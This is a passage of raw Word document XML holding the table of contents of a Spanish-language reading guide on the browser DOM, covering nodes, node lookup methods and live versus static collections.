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1D1D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc239319966"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Capítulo 4 — GUÍA DE LECTURA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="30094A59" w14:textId="6F9A6DEB" w:rsidR="000A5A7F" w:rsidRDefault="00346AC7">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9319966" w:history="1">
        <w:r w:rsidR="000A5A7F" w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Capítulo 4 — GUÍA DE LECTURA</w:t>
        </w:r>
        <w:r w:rsidR="000A5A7F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000A5A7F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000A5A7F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319966 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000A5A7F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000A5A7F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000A5A7F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="000A5A7F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F75F70B" w14:textId="15CC344B"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967" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>El DOM: programar la página sin framework</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319967 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B93627A" w14:textId="2CE8A6BC"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68" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>El árbol vivo, los eventos y la memoria, explicados en criollo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319968 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00359101" w14:textId="6A9AA7FC"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969" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Antes de empezar: cómo usar esta guía</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319969 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22088D0F" w14:textId="7E6A173F"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970" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.1 — De qué se trata esta clase</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319970 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D184D0C" w14:textId="05249605"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71" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Qué dice</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319971 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="685089FE" w14:textId="635109C1"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72" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>En criollo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319972 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74CABDCC" w14:textId="34A7045F"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973" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.2 — Por qué existe el DOM: el problema que vino a resolver</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319973 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20E023DD" w14:textId="17297474"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74" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Qué dice</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319974 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51CC865D" w14:textId="4223D6C9"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75" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>En criollo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319975 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E4B76A7" w14:textId="6922376D"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76" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Las tres decisiones que explican su forma actual</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319976 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2013A87B" w14:textId="2465B71E"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77" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Corresponde hablar de jQuery</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319977 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D3338EC" w14:textId="3308CA2F"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978" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.3 — El DOM no es el HTML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319978 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="211B7F17" w14:textId="2B69C3C0"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79" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Qué dice</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319979 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36E76887" w14:textId="4A8D8230"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80" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>En criollo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319980 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66A1CE58" w14:textId="6C7536AF"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981" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.4 — Anatomía del árbol: todo es un nodo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319981 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6875F4DC" w14:textId="451946CD"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82" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Lo de los espacios no es un detalle</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319982 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="103F9589" w14:textId="12E88837"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983" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.5 — Cómo se buscan los nodos</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319983 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="725854AD" w14:textId="0B5AE518"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984" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.5.1 — Los métodos</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319984 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41B55B9F" w14:textId="3977D2B4"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85" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>El detalle que te ahorra media hora</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319985 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6588B674" w14:textId="21F51507"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986" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.5.2 — Colecciones vivas y listas estáticas: el bug que funciona a medias</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319986 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48CC7C39" w14:textId="3E6F4F02"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987" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.6 — Crear y modificar</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
